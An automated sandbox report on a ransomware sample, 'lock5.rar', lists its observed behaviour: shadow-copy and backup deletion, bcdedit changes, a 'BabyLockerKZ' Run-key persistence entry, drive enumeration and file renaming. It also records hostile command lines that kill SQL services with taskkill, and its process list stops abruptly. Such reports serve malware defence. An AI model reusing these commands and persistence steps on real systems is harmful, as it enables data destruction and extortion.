Malware Analysis Report

2024-12-07 09:56

Sample ID 241114-knxmvazmen
Target lock5.rar
SHA256 d9a3697fa898a224f3111f86a1c2d3f37cf3bfd555c5a7e8900c7dda6f1f7d9b
Tags
defense_evasion discovery evasion execution impact persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d9a3697fa898a224f3111f86a1c2d3f37cf3bfd555c5a7e8900c7dda6f1f7d9b

Threat Level: Known bad

The file lock5.rar was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies boot configuration data using bcdedit

Renames multiple (228) files with added filename extension

Deletes shadow copies

Deletes system backups

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Adds Run key to start application

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 08:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 08:45

Reported

2024-11-14 08:48

Platform

win7-20240903-en

Max time kernel

149s

Max time network

120s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2752 created 1216 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (228) files with added filename extension

ransomware

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\7zO428A56F6\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\7zO428A56F6\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cipher.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cipher.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 2752 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe
PID 2084 wrote to memory of 2752 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe
PID 2084 wrote to memory of 2752 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe
PID 2752 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2768 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2768 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2768 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2768 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2752 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2684 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2684 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2724 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2724 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2724 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2616 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2616 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2556 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2612 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2612 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3052 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3052 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3052 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3064 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3064 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 1444 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 320 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lock5.rar"

C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe

"C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlbrowser.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sql writer.exe

C:\Windows\SysWOW64\cmd.exe

